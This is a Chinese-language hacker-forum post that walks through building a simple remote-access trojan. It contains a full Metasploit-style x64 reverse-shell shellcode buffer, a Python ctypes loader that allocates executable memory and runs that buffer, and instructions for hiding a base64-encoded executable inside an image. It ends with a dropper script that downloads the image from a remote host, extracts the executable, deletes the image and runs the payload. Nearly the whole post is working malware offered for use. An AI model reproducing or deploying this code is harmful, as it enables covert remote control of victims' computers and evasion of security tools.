Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Recommended Posts

什么是rat

可以在受害者机器内安装恶意组件
以下来自百度的解释:

rat是特洛伊木马的一个变体,也成为net-hack程序。RAT是一个可以在目标计算机上安装服务器组件的恶意代码。

思路

1.msf生成shellcode
2.将shellcode base64编码藏在图片里
3.将图片放入远程站点
4.py写一个下载远程图片并匹配出base64写入exe
5.删除下载的图片

操作

msf生成的shellcode

buf =  b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41"
buf += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
buf += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
buf += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
buf += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
buf += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66"
buf += b"\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b\x80"
buf += b"\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50"
buf += b"\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
buf += b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48"
buf += b"\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75"
buf += b"\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b"
buf += b"\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
buf += b"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
buf += b"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
buf += b"\x12\xe9\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f"
buf += b"\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0"
buf += b"\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0"
buf += b"\xa8\xf1\x84\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba"
buf += b"\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01\x00"
buf += b"\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41"
buf += b"\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48"
buf += b"\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf"
buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2"
buf += b"\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x85\xc0"
buf += b"\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00\x48"
buf += b"\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"
buf += b"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8"
buf += b"\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
buf += b"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31"
buf += b"\xc9\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49"
buf += b"\x89\xc7\x4d\x31\xc9\x49\x89\xf0\x48\x89\xda\x48\x89"
buf += b"\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d"
buf += b"\x28\x58\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a"
buf += b"\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41"
buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c\xff"
buf += b"\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4"
buf += b"\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2"
buf += b"\x56\xff\xd5"

使用py来执行shellcode
import ctypes
import sys
import chardet
from ctypes import *
import binascii

buf =  b"shellcode"



#这两个微软官方说明是可读可写可执行,PAGE_EXECUTE_READWRITE和VIRTUAL_MEM
PAGE_EXECUTE_READWRITE = 0x00000040 #参数设定
VIRTUAL_MEM = ( 0x1000 | 0x2000 ) #参数设定
buf_arr = bytearray (buf) #shellcode变为一个新的字节数组
buf_size = len(buf_arr) #计算shellcode的大小
kernel32 = ctypes.cdll.LoadLibrary("kernel32.dll") #调用kernel32.dll
kernel32.VirtualAlloc.restype = ctypes.c_uint64 #返回类型为c_uint64
sc_ptr = kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(buf_size), VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) #设置
buf_ptr = (ctypes.c_char * buf_size).from_buffer(buf_arr) #将shellcode指向指针
#print(sc_ptr)
#print(buf_ptr)
kernel32.RtlMoveMemory(ctypes.c_uint64(sc_ptr),buf_ptr,ctypes.c_int(buf_size)) #调用dll,指向shellcode

handle = kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(sc_ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
将执行shellcode的py打包成exe,然后打开,对其进行base64编码

然后用HxDx64打开指定的图片,然后将
base64编码的exe写入到图片里

我的图片是

EPnxwn.png

加入base64编码后的exe

EPnzoq.png

加入shellcode后图片大小为7mb

EPupF0.png

注意

将其扔到远程站点,这里以phpstudy搭建为例,不要把放图床,图床会把你图片给模糊或减小你内存
shellcode就少了
代码

代码如下

#author:九世
#time:2019/4/20

import asyncio
import requests
import re
import base64
import os

async def demo():
    url = 'http://192.168.3.83/timg.jpg' #你的图片地址
    rqt=requests.get(url=url)
    with open('xxx.jpg','wb') as r:
        r.write(rqt.content)

def zx():
    dq=open('xxx.jpg','rb')
    zg=str(dq.read()).replace("b'",'').replace("'",'')
    pp=re.findall('TVq.*',zg)
    zh=base64.b64decode(pp[0])
    with open('demo.exe','wb') as w:
        w.write(zh)
    os.remove('xxx.jpg')
    os.system('demo.exe')

def pd():
    j='xxx.jpg'
    if os.path.exists(j):
        file=os.path.getsize(j)
        if file==7985376:
            zx()
        else:
            exit()

async  def main():
    thead=[]
    thead.append(asyncio.ensure_future(demo()))
    await asyncio.wait(thead)
if __name__ == '__main__':
    loop=asyncio.get_event_loop()
    loop.run_until_complete(main())
    loop.close()
    pd()

测试结果
EPusmj.md.gif

仓库地址:

https://github.com/422926799/python/tree/master/%E7%AE%80%E5%8D%95%E7%9A%84RAT
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...